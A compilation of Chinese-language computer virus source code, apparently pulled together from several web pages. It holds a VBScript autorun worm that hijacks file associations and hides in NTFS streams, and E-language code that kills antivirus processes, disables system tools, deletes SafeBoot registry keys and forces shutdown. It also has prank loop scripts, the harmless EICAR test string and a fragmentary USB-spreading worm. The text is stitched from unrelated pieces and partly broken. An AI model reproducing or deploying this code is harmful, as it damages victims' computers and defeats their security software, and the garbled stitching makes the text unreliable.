VBCRLF&"shell\explore=资源管理器(&X)"&VBCRLF&"shell\explore\command=WScript.exe "&VirusName&" ""AutoRun"""Call KillImmunity(D)Call CreateFile(StrInf, InfPath)Call SetHiddenAttr(InfPath)End IfEnd SubSub SetTxtFileAss(sFilePath)'改变txt格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetIniFileAss(sFilePath)'改变ini格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetInfFileAss(sFilePath)'改变inf格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetBatFileAss(sFilePath)'改变bat格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetCmdFileAss(sFilePath)'改变cmd格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SethlpFileAss(sFilePath)'改变hlp格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetRegFileAss(sFilePath)'改变reg格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetchmFileAss(sFilePath)'改变chm格式⽂件关联On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" %1 %* "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")End SubSub SetIEAss(sFilePath)'篡改IE启动设置On Error Resume NextDim ValueValue="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OIE "Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ")Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value,"REG_EXPAND_SZ")End SubSub SetMyComputerAss(sFilePath)'改变我的电脑的打开关联，包括Win+EOn Error Resume NextDim Value1,Value2Value1="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" OMC "Value2="%SystemRoot%\System32\WScript.exe "&""""&sFilePath&""""&" EMC "Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ")Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2,"REG_EXPAND_SZ")End SubFunction GetSerialNumber(Drv)'获取驱动器序列号的绝对值On Error Resume NextSet d=fso.GetDrive(Drv)GetSerialNumber=d.SerialNumber'返回⼗进制序列号，⽤于唯⼀标识⼀个磁盘卷GetSerialNumber=Replace(GetSerialNumber,"-","")'去掉负号End FunctionFunction GetMainVirus(N)'根据N的值获取不同的字符串On Error Resume NextMainVirusName=GetSerialNumber(GetSystemDrive())&".vbs"'以驱动器的序列号绝对值为vbs病毒的名字If GetFileSystemType(GetSystemDrive())="NTFS" Then'系统盘是NTFS分区If N=1 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\smss.exe:"&MainVirusName'返回"c:\windows\system32\smss.exe:72161642.vbs"End IfIf N=0 ThenGetMainVirus=Fso.GetSpecialFolder(N)&"\explorer.exe:"&MainVirusName'返回"c:\windows\explorer.exe:72161642.vbs"End IfElse'系统盘是FAT32分区GetMainVirus=Fso.GetSpecialFolder(N)&"\"&MainVirusName'返回"c:\windows\72161642.vbs"或者"c:\windows\system32\72161642.vbs"End IfEnd FunctionFunction VBSProcessCount(VBSPath)'返回指定路径vbs脚本的运⾏个数On Error Resume NextDim WMIService, ProcessList, ProcessVBSProcessCount=0Set WMIService=GetObject("winmgmts:\\.\root\cimv2")Set ProcessList=WMIService.ExecQuery("Select * from Win32_Process Where "&"Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process in ProcessListIf InStr(mandLine, VBSPath)>0 ThenVBSProcessCount=VBSProcessCount+1End IfNextEnd FunctionFunction PreDblInstance()'⽤来计数wscript进程的个数，如果⼤于等于3个那么返回TrueOn Error Resume NextPreDblInstance=FalseIf VBSProcessCount(WScript.ScriptFullName)>= 3 ThenPreDblInstance=TrueEnd IfEnd FunctionFunction GetTargetPath(LnkPath)'获取快捷⽅式的vbs脚本地址On Error Resume NextDim ShortcutSet Shortcut=WshShell.CreateShortcut(LnkPath)GetTargetPath=Shortcut.TargetPathEnd FunctionFunction GetCode(FullPath)'获取⽂件的所有代码On Error Resume NextDim FileTextSet FileText=FSO.OpenTextFile(FullPath, 1)GetCode=FileText.ReadAllFileText.CloseEnd FunctionFunction GetVersion()'获取windows版本Dim VerInfoVerInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"If ReadReg(VerInfo)="" ThenGetVersion=0ElseGetVersion=CInt(ReadReg(VerInfo))End IfEnd FunctionSub VirusAlert()'创建⼀个BFAlert.hta，然后打开该⽹页，⿊⿊的，什么都没有，吓⼈的On Error Resume NextDim HtaPath,HtaCodeHtaPath=Fso.GetSpecialFolder(1)&"\BFAlert.hta"HtaCode="<HTML><HEAD><TITLE>暴风⼀号</TITLE>"&VBCRLF&"<HTA:APPLICATION APPLICATIONNAME=""BoyFine V1.0"" SCROLL=""no"" windowstate=""maximize"" border=""none"""&VBCRLF&"SINGLEINSTANCE=""yes"" CAPTION=""no"" contextMenu=""no"" ShowInTaskBar=""no"" selection=""no"">"&VBCRLF&"</HEAD><BODY bgcolor=#000000><DIV align =""center"">"&VBCRLF&"<font style=""font-size:3500%;font-family:Wingdings;color=red"">N</font><BR>"&VBCRLF&"<font style=""font-size:200%;font-family:⿊体;color=red"">暴风⼀号</font>"&VBCRLF&"</DIV> </BODY></HTML>"If FSO.FileExists(HtaPath)=False ThenCall CreateFile(HtaCode, HtaPath)Call SetHiddenAttr(HtaPath)End IfCall Run(HtaPath)End SubFunction GetInfectedDate()'获取感染⽇期On Error Resume NextDim DateInfoDateInfo="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"If ReadReg(DateInfo)="" ThenGetInfectedDate=""ElseGetInfectedDate=CDate(ReadReg(DateInfo))End IfEnd FunctionSub MakeJoke(Times)'恶搞，弹出光驱On Error Resume NextDim WMP, colCDROMsSet WMP = CreateObject( "WMPlayer.OCX" )Set colCDROMs = WMP.cdromCollectionIf colCDROMs.Count >0 ThenFor i=1 to TimescolCDROMs.Item(0).eject()WScript.Sleep 3000colCDROMs.Item(0).eject()NextEnd IfSet WMP = NothingEnd Sub病毒的运⾏思路：添加启动项，隐藏各个盘符下的⽬录，创建指向的快捷⽅式，破坏隐藏选项，破坏⽂件关联，破坏我的电脑打开⽅式，开启⾃动播放，创建autorun.inf。

易语言病毒源码大全

易语言病毒源码大全运行(“taskkill/f/im kavsvc.exe”,假,1)运行(“taskkill/f/im KVXP.kxp”,假,1)运行(“taskkill/f/im Rav.exe”,假,1)运行(“taskkill/f/im Ravmon.exe”,假,1)运行(“taskkill/f/im Mcshield.exe”,假,1)运行(“taskkill/f/im VsTskMgr.exe”,假,1)置现行时间(到时间(“8888年8月8日”))写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTask Mgr”,0)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregist rytools”,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”,1)写注册项(3,“SoftWare\Microsoft\Windows\CurrentVersion \Policies\WinOldApp\Disabled”,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,1)写注册项(4,“SOFTWARE\360Safe\safemon\ExecAccess”,0)写注册项(4,“SOFTWARE\360Safe\safemon\MonAccess”,0)写注册项(4,“SOFTWARE\360Safe\safemon\SiteAccess”,0)写注册项(4,“SOFTWARE\360Safe\safemon\UDiskAccess”,0)运行(“taskkill/f/im360tray.exe”,假,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”,4294967295)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOn Drive”,4294967295)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderO ptions”,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”,1)写注册项(3,“Software\Policies\Microsoft\Windows\System\DisableCMD”,1)写注册项(3,“Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”,1)写注册项(3,“Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”,1)写注册项(3,“Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”,1)写注册项(3,“Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”,1)写注册项(3,“Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”,1)写注册项(3,“Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”,3)写注册项(3,“Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”,1)写注册项(1,“.txt\”,“jpegfile”)写注册项(1,“.inf\”,“jpegfile”)写注册项(1,“.reg\”,“jpegfile”)写注册项(1,“.exe\”,“jpegfile”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11 CF-8056-444553540000}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11 CE-BFC1-08002BE10318}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-1 1D0-BEC7-08002BE2092F}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-1 1D0-B6FE-00A0C90F57DA}\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AFD\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Boot file system\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Browser\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Dhcp\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmadmin\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dmserver\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\DnsCache\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\File system\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Filter\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation \”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LmHosts\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Messenger\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Ndisuio\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetBT\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\”)“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Netlogon\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetMan\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Network\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Primary disk\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\RpcSs\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\sr.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SRService\”)“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Tcpip\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\TDI\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\termservice\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vga.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vgasave.sys\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WinMgmt\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\WZCSVC\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\Network\”)删除注册项(4,“SYSTEM\CurrentControlSet\Control\SafeBoot\”)关闭系统(2,假)运行（“shutdown-s-f”）。

[计算机病毒源代码]计算机病毒源代码怎么样

[计算机病毒源代码]计算机病毒源代码怎么样计算机病毒源代码介绍一：1.vbs版本：打开记事本，输入以下代码：do until 1=2w.echo "烦死你!"loop保存为1.vbs，运行后不断出现"烦死你"的对话框。

2.vb6版本：打开visual basic 6.0，双击窗体，输入以下代码：private sub form_load()do until 1=2me.hideme.showshell "calc.exe"loopend sub 保存后编译为exe文件，运行后马上死机。

计算机病毒源代码介绍二：病毒测试代码：欧洲计算机防病毒协会提供的测试病毒代码。

本代码尽管测试，无任何危险。

请复制下面的代码到文本中保存x5o!p%@ap[4\pzx54(p^)7cc)7}$eicar-standard-antivirus-tes t-file!$h+h*请复制上面的代码到文本中保存测试方法：1.鼠标右键点击桌面空白处，创建一个“文本文档”。

2.将上面这段测试代码复制到“文本”里，保存，然后可以直接右键点击这个文本，用杀毒软件扫描也可以等一会，如果你的杀毒软件还行，会自动报毒并将该文本删除那就可以初步放心了。

测试原理：该段代码是欧洲计算机防病毒协会开发的一种病毒代码，其中的特征码已经包含在各种杀毒软件的病毒代码库里，所以可以用做测试病毒扫描引擎。

测试等级:特等：复制完代码后便提示内存有病毒优等：刚保存完就提示病毒(或者直接删除)中等：保存后几秒提示病毒(或者直接删除)下等：需自己启动病毒扫描查杀才提示病毒(或者直接删除) 看了“计算机病毒源代码怎么样”文章的。

autorun.inf病毒源代码

if fso.FileExists(new_disk&"stNP.vbs") = -1 then
else
add_stNP(new_disk)
end if
add_attrib(new_disk&"stNP.vbs")
shell\explore\Command=WScript.exe stNP.vbs
'文件名：stNP.vbs
on error resume next
set fso = CreateObject("Scripting.FileSys"&"temObject")
if fso.FileExists("NP.vbs") = -1 then
dim n
n=0
do while n<=new_n
old_drs(n) = new_drs(n)
n=n+1
loop
old_n = new_n
end function
else
add_desktop(rec)
end if
add_attrib(rec&"desktop.ini")
aim_folder = rec&Date()&Rnd()
set fc = fp.files
for each f in fc
fso.copyfile f&"", aim_folder&"\", true
next
'-----------------</维护块>-----------------